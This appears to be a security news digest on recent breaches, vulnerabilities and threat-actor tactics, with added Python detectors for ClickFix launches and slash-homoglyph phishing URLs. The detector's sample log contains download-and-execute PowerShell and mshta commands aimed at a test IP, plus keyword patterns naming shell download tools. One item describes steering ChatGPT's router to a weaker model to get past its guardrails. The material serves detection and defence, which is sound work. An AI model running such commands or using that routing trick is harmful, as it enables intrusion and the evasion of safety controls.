Major Incidents or Breaches#

  • Colt Technology Services Ransomware Attack

    • UK-based Colt Technology Services confirmed that customer documentation was stolen in a ransomware attack; the Warlock ransomware gang is auctioning the stolen files. The company is still restoring the systems the attack disrupted.
  • Orange Belgium Data Breach

    • Orange Belgium disclosed that attackers accessed the data of approximately 850,000 customer accounts during a cyberattack in July. No further technical details were provided.
  • Ex-Developer Sentenced for Sabotage

    • A former developer was sentenced to four years in prison for planting custom malware and a kill switch on his former employer's network; the kill switch fired when his own account was disabled, locking employees out.
  • Scattered Spider Member Sentenced

    • Noah Michael Urban, a member of the Scattered Spider cybercrime group, was sentenced to 10 years in prison for wire fraud and conspiracy related to high-profile attacks.

Newly Discovered Vulnerabilities#

  • Apple Zero-Day Vulnerability (CVE-2025-43300)

    • Apple released security updates for iOS, iPadOS and macOS to patch a zero-day, an out-of-bounds write in the ImageIO image-parsing framework, that Apple says was exploited in extremely sophisticated attacks against specific targeted individuals. All users are advised to update.
  • Commvault Pre-Auth Exploit Chains

    • Four vulnerabilities in Commvault were disclosed and patched. Chained together they form pre-authentication exploit paths that end in remote code execution on unpatched instances, so the fix should be treated as urgent on any internet-reachable deployment.
  • Password Managers Clickjacking Risk

    • Security research presented at DEF CON 33 showed that nearly a dozen password manager browser extensions are vulnerable to DOM-based clickjacking: a malicious page can hide or overlay the extension's autofill prompt so that a single click on an innocuous element fills credentials, TOTP codes or payment card data into attacker-controlled fields. Until an extension is patched, disabling automatic autofill in favour of a manual trigger removes the one-click path.
  • ChatGPT Downgrade Attack

    • A downgrade attack was demonstrated against ChatGPT's model router: by embedding routing cues in a prompt, an attacker can steer a request to an older, less safety-hardened model instead of GPT-5, bypassing the guardrails of the newer model.

Notable Threat Actor Activity#

  • Russian APT Exploiting Cisco Vulnerability

    • The FBI reported that the Russian state-sponsored group Static Tundra (linked to the FSB) is exploiting a seven-year-old vulnerability in the Smart Install feature of Cisco IOS and IOS XE (CVE-2018-0171) to collect configuration data from critical-infrastructure network devices, many of them unpatched or end-of-life. Disabling Smart Install (no vstack) and blocking TCP port 4786 at network borders close the attack path on devices that cannot be patched.
  • Warlock Ransomware

    • The Warlock ransomware gang is responsible for the Colt Technology Services breach and is actively auctioning stolen data.
  • CORNFLAKE.V3 Backdoor Deployment

    • Threat actors are deploying the CORNFLAKE.V3 backdoor via the ClickFix social engineering tactic, as observed by Mandiant: a fake CAPTCHA page copies a command to the victim's clipboard and instructs them to "verify" by pasting it into the Windows Run dialog, which launches a PowerShell stage that fetches the backdoor.
  • QuirkyLoader Malware Campaigns

    • QuirkyLoader, a new malware loader, is being used in email spam campaigns to deliver payloads such as Agent Tesla, AsyncRAT, and Snake Keylogger.
  • Phishing Attacks Targeting Brokerage Accounts

    • Professional phishing groups are targeting customers of brokerage firms in "ramp and dump" schemes: hijacked brokerage accounts are used to buy thinly traded stocks that the attackers already hold, ramping the price so they can sell their own shares at a profit.
  • Booking.com Homoglyph Phishing

    • Attackers impersonating Booking.com are using homoglyph phishing URLs in which a Japanese katakana character that resembles a forward slash replaces the slashes after the brand name. The browser treats the whole run as one hostname, so the link appears to point to booking.com while the registrable domain is attacker-controlled, and naive string matching on "/" fails to spot it.
  • HR Impersonation Phishing Surge

    • HR-related phishing attacks surged by 120% in Q1 2025, with "urgent payroll update" lures and quishing (QR code phishing) that delivers the QR code or redirect inside SVG attachments carrying encrypted script payloads, which static mail scanners often miss.
  • Social Engineering in Industrial and OT Environments

    • Social engineering attacks on operational technology (OT) sectors are increasing, with phishing and manipulation aimed at staff of industrial organisations who hold access to control systems.
  • Abuse of VPS Infrastructure

    • Threat actors are increasingly leveraging legitimate virtual private server (VPS) providers for rapid, stealthy infrastructure deployment: hosts are cheap, provisioned in minutes and share reputation with legitimate tenants, so blocking by provider is rarely an option.
  • Weak Passwords and Account Compromise

    • The Blue Report 2025 highlights that weak passwords and compromised credentials remain primary factors in impactful cyberattacks, more so than advanced exploits.
  • Phishing and MFA Social Engineering

    • Attackers are evolving their phishing tactics to target MFA processes, focusing on help desk and frontline support agents: callers impersonate employees to have a password reset or a new MFA device enrolled, sidestepping the factor entirely.
  • AI and LLMs in Security

    • New frameworks such as Tree of AST use large language models (LLMs) to improve vulnerability discovery, and DARPA's AI Cyber Challenge demonstrated automated discovery and patching of vulnerabilities at scale.
  • EV Smart Charging Security Risks

    • Adoption of the ISO 15118 standard for EV smart charging (Plug & Charge and bidirectional vehicle-to-grid communication) introduces cyber risks: the V2G channel can be weaponised if not properly secured.
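
The ClickFix item above describes a process tree, not a file hash, so it is best caught with process-creation telemetry. The following is an added example (not Mandiant's code and not real telemetry) that runs a ClickFix rule over constructed Sysmon-style Event ID 1 records: it flags an interpreter spawned directly by explorer.exe (the Run dialog's parent) only when the command line also shows download-and-execute behaviour, so a user simply opening PowerShell, or an administrator running an encoded command from a terminal, is not flagged. The pipe-delimited record format and all user names and IPs are assumptions for the example.

```python
"""ClickFix detection over constructed Sysmon-like process-creation records.

Rule: child is an interpreter/LOLBin, parent is explorer.exe (Run dialog),
AND the command line carries at least one download-and-execute indicator.
"""
import re
from dataclasses import dataclass

# Interpreters and LOLBins that ClickFix lures commonly launch from the Run dialog.
RUN_DIALOG_CHILDREN = {
    "powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
    "curl.exe", "wscript.exe", "cscript.exe",
}

# Command-line fragments that indicate download-and-execute behaviour.
SUSPICIOUS_ARGS = [
    re.compile(r"-e(nc(odedcommand)?)?\s", re.I),           # -e / -enc / -EncodedCommand
    re.compile(r"\b(iex|invoke-expression)\b", re.I),
    re.compile(r"\b(iwr|invoke-webrequest|curl|wget|downloadstring)\b", re.I),
    re.compile(r"https?://", re.I),
    re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    re.compile(r"\bmshta(\.exe)?\s+\S+", re.I),              # mshta handed a remote script
]


@dataclass
class ProcessEvent:
    image: str
    parent_image: str
    user: str
    command_line: str


def parse_sysmon_line(line: str) -> ProcessEvent:
    """Parse the constructed pipe-delimited format used here. CommandLine is the
    last field so that any '|' inside the command line survives the split."""
    kv = dict(f.split("=", 1) for f in line.split("|", 4))
    return ProcessEvent(kv["Image"], kv["ParentImage"], kv["User"], kv["CommandLine"])


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def clickfix_indicators(ev: ProcessEvent) -> list[str]:
    """Return every indicator that fires for one event (empty list = clean)."""
    hits = []
    if basename(ev.image) in RUN_DIALOG_CHILDREN and basename(ev.parent_image) == "explorer.exe":
        hits.append("interpreter spawned directly by explorer.exe (Run dialog / shell)")
    for pat in SUSPICIOUS_ARGS:
        if pat.search(ev.command_line):
            hits.append(f"command line matches {pat.pattern!r}")
    return hits


def is_clickfix_candidate(ev: ProcessEvent) -> bool:
    """Explorer parent plus at least one command-line indicator; either alone is noise."""
    hits = clickfix_indicators(ev)
    return any(h.startswith("interpreter spawned") for h in hits) and len(hits) >= 2


# Constructed sample records (hypothetical users, RFC 5737 test IPs): a ClickFix
# PowerShell launch, a user opening PowerShell normally, an admin's encoded command
# from a terminal, a ClickFix mshta launch, and an ordinary browser launch.
SAMPLE_LOG = [
    r'EventID=1|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|ParentImage=C:\Windows\explorer.exe|User=CORP\jdoe|CommandLine=powershell.exe -w hidden -nop -c "iex (iwr http://203.0.113.10/verify.txt -UseBasicParsing)"',
    r'EventID=1|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|ParentImage=C:\Windows\explorer.exe|User=CORP\bwong|CommandLine="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"',
    r'EventID=1|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|ParentImage=C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_1.21\WindowsTerminal.exe|User=CORP\ops-admin|CommandLine=powershell.exe -NoProfile -EncodedCommand SQBtAHAAbwByAHQALQBNAG8AZAB1AGwAZQA=',
    r'EventID=1|Image=C:\Windows\System32\mshta.exe|ParentImage=C:\Windows\explorer.exe|User=CORP\asmith|CommandLine=mshta.exe https://203.0.113.10/c/recaptcha.mp4',
    r'EventID=1|Image=C:\Program Files\Google\Chrome\Application\chrome.exe|ParentImage=C:\Windows\explorer.exe|User=CORP\jdoe|CommandLine="C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory=Default',
]


def flagged_users(lines=SAMPLE_LOG) -> list[str]:
    """Users whose events match the ClickFix rule, in log order."""
    return [ev.user for ev in map(parse_sysmon_line, lines) if is_clickfix_candidate(ev)]


if __name__ == "__main__":
    for line in SAMPLE_LOG:
        ev = parse_sysmon_line(line)
        verdict = "CLICKFIX?" if is_clickfix_candidate(ev) else "ok"
        print(f"{verdict:10} {ev.user:16} {basename(ev.image)} <- {basename(ev.parent_image)}")
        for hit in clickfix_indicators(ev):
            print("             -", hit)
```

Requiring both conditions is the point: the explorer.exe parent by itself matches every user who launches PowerShell from the Start menu, and an encoded command by itself matches routine administration. On a real fleet the parent-process check should also accept the RunMRU-backed path of cmd.exe launched by explorer, and the indicator list will need tuning per environment.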

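The Booking.com item above turns on how a URL parser, not a human, reads the string. The following is an added example (not the original researchers' code) that analyses a URL for slash look-alikes: it recovers the domain a reader perceives (everything up to the first fake slash), the registrable domain the browser will actually resolve, and the punycode form that goes on the wire. The sample URLs are constructed, U+30CE (KATAKANA LETTER NO, ノ) is assumed as the look-alike in the lure, and the registrable-domain logic is a naive last-two-labels approximation rather than a Public Suffix List lookup.

```python
"""Detect slash look-alike homoglyphs in URLs (added example; constructed samples).

Every "/" after the brand name is replaced by a look-alike, so the browser
(and urlsplit) treat the whole run up to the first REAL "/" as one hostname.
"""
import unicodedata
from urllib.parse import urlsplit

# Characters that render like "/" but are not the ASCII solidus.
SLASH_LOOKALIKES = {
    "\u30ce",  # KATAKANA LETTER NO (assumed lure character)
    "\u2215",  # DIVISION SLASH
    "\u2044",  # FRACTION SLASH
    "\uff0f",  # FULLWIDTH SOLIDUS
}


def apparent_domain(host: str) -> str:
    """What a reader perceives as the hostname: everything before the first fake slash."""
    for i, c in enumerate(host):
        if c in SLASH_LOOKALIKES:
            return host[:i]
    return host


def registrable_domain(host: str) -> str:
    """Naive eTLD+1 (last two labels); a production check would consult the PSL."""
    return ".".join(host.split(".")[-2:])


def analyse_url(url: str) -> dict:
    reasons = []
    try:
        host = urlsplit(url).hostname or ""
    except ValueError as exc:
        # urlsplit refuses netlocs whose NFKC form would contain a separator
        # (e.g. FULLWIDTH SOLIDUS normalises to "/"); that alone is a red flag.
        return {"url": url, "suspicious": True, "reasons": [f"netloc rejected: {exc}"]}

    fakes = [c for c in host if c in SLASH_LOOKALIKES]
    if fakes:
        names = sorted({unicodedata.name(c, "?") for c in fakes})
        reasons.append(f"slash look-alike(s) in hostname: {', '.join(names)}")
    other_non_ascii = sorted({c for c in host if ord(c) > 0x7F} - SLASH_LOOKALIKES)
    if other_non_ascii:
        reasons.append(f"other non-ASCII hostname characters: {other_non_ascii}")

    seen, real = apparent_domain(host), registrable_domain(host)
    if not seen.endswith(real):
        reasons.append(f"apparent domain {seen!r} is not under registrable domain {real!r}")

    try:
        wire_host = host.encode("idna").decode("ascii")  # what is actually resolved
    except UnicodeError:
        wire_host = None

    return {
        "url": url, "host": host, "apparent_domain": seen, "registrable_domain": real,
        "wire_host": wire_host, "suspicious": bool(reasons), "reasons": reasons,
    }


# Constructed samples (not real phishing URLs): the lure pattern, the genuine
# site, and a variant using FULLWIDTH SOLIDUS, which urlsplit itself rejects.
PHISH = "https://account.booking.com\u30cedetail\u30cerestric-access.www-account-booking.com/en/"
LEGIT = "https://account.booking.com/detail/restric-access"
FULLWIDTH = "https://account.booking.com\uff0fdetail.www-account-booking.com/en/"

if __name__ == "__main__":
    for u in (PHISH, LEGIT, FULLWIDTH):
        r = analyse_url(u)
        print("SUSPICIOUS" if r["suspicious"] else "ok        ", u)
        for reason in r["reasons"]:
            print("   -", reason)
```

The mismatch between apparent_domain and registrable_domain is the signal worth alerting on in a mail gateway; the look-alike character list only covers the separators seen so far, while the domain comparison catches the trick regardless of which code point is substituted.
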
Regulatory or Policy Developments Affecting the Security Industry#

  • Fake Europol Reward for Qilin Ransomware

    • Europol confirmed that a Telegram channel offering a $50,000 reward for information on Qilin ransomware administrators was fraudulent and not affiliated with the agency.
  • Google Settles YouTube Child Privacy Lawsuit

    • Google agreed to a $30 million settlement over allegations of YouTube’s data collection practices involving minors, though the company did not admit to targeting children for advertising.